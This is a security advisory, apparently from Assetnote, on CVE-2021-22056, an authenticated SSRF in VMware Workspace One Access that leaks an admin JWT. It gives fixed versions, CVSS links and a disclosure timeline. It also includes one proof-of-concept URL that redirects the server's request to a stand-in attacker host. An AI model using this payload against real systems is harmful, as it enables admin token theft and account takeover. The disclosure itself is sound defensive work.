January 17, 2022

Advisory: VMWare Workspace One Access (CVE-2021-22056)

No items found.

Creative Commons license

Summary

When authenticated as an administrator user inside VMWare Workspace One Access, it is possible to send HTTP requests to arbitrary URLs and read the full HTTP response for these requests. When the HTTP requests are being made, an authentication header (Authorization) is sent, which includes an admin-level JWT.

Impact

Due to the lack of a slash character, it is possible for an attacker to make HTTP requests to arbitrary origins and read the full response. Furthermore, an authorization header gets leaked and hence it is possible for an attacker to weaponize this vulnerability to steal the authorization header of an admin upon viewing an image or making a single click.

Version Tested Against

<span class="code_single-line">identity-manager-20.01.0.0-15509389_OVF10.ova</span> - 20.01

Admin token disclosure affects 20.01, but not later versions.

Later versions are still vulnerable to the SSRF vulnerability.

Product Description

Workspace ONE Access, (formerly VMware Identity Manager), provides multi-factor authentication, conditional access and single sign-on to SaaS, web and native mobile apps.

Solution

VMWare’s advisory can be found here.

As per VMWare’s advisory, the following versions are considered fixed:

Fixed Version:

VMware Workspace ONE Access 21.08.0.1
https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08.0.1/rn/vmware-workspace-one-access-210801-release-notes/index.html

VMware Workspace ONE Access 21.08, 20.10.0.1, 20.10

https://kb.vmware.com/s/article/87183

 

VMware Identity Manager (vIDM) 3.3.5, 3.3.4, 3.3.3
https://kb.vmware.com/s/article/87185

 

Mitre CVE Dictionary Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22056

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22057

 

FIRST CVSSv3 Calculator:
CVE-2021-22056 https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N
CVE-2021-22057 https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Vulnerabilities

https://access.reverse.test/SAAS/API/1.0/REST/system/health/instanceHealth?hostName=access.reverse.test&path=@attackercontrolledhost.com

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.

Credits

Assetnote Security Research Team and Keiran Sampson

Timeline

The timeline for this disclosure process can be found below:

Oct 5th, 2021: Disclosure of account takeover via post auth SSRF
Oct 5th, 2021: Response from VMWare confirming receipt of vulnerability
Nov 9th, 2021: Assetnote Security Research team requests an update on the issue
Nov 12th, 2021: Response from VMWare confirming that vulnerability is being worked on
Dec 8th, 2021: Assetnote Security Research team requests an update on the issue
Dec 8th, 2021: Response from VMWare confirming they could reproduce SSRF but not admin token disclosure on latest version of Workspace One Access
Dec 10th, 2021: Response from VMWare confirming progress is being made on fixes
Dec 17th, 2021: VMWare publishes advisory

Written by:

Shubham Shah

Your subscription could not be saved. Please try again.

Your subscription has been successful.

Ready to get started?

Get on a call with our team and learn how Assetnote can change the way you secure your attack surface. We'll set you up with a trial instance so you can see the impact for yourself.

Request a Demo